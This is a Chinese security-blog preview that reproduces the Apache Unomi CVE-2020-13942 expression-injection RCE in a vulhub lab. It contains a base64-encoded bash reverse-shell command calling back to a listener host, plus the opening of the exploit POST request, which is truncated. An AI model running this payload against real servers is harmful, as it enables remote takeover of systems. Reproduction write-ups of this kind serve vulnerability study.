今天看啥  ›  专栏  ›  黑白之道

Apache Unomi 远程表达式代码执行(CVE-2020-13942)漏洞复现

黑白之道  · 公众号  · 互联网安全  · 2020-12-18 10:14

文章预览

Apache Unomi 是一个基于标准的客户数据平台(CDP,Customer Data Platform),用于管理在线客户和访客等信息,以提供符合访客隐私规则的个性化体验。在Apache Unomi 1.5.1级以前版本中,存在一处表达式注入漏洞,远程攻击者通过MVEL和OGNL表达式即可在目标服务器上执行任意命令。 影响版本: Apache Unomi < 1.5.2 漏洞复现: 使用vulhub搭建docker环境,访问主页http://192.168.10.128:8181/   将bash命令进行编码 (网站:http://www.jackson-t.ca/runtime-exec-payloads.html) bash -c { echo ,YmFzaCAtaSA JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjEzNC85OTk5IDA JjE=}|{base64,-d}|{bash,-i}   监听端口   抓包执行poc POST /context.json HTTP/1.1 Host : 192.168.10.128:8181 Accept-Encoding : gzip, deflate Accept : */* Accept-Language : en User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览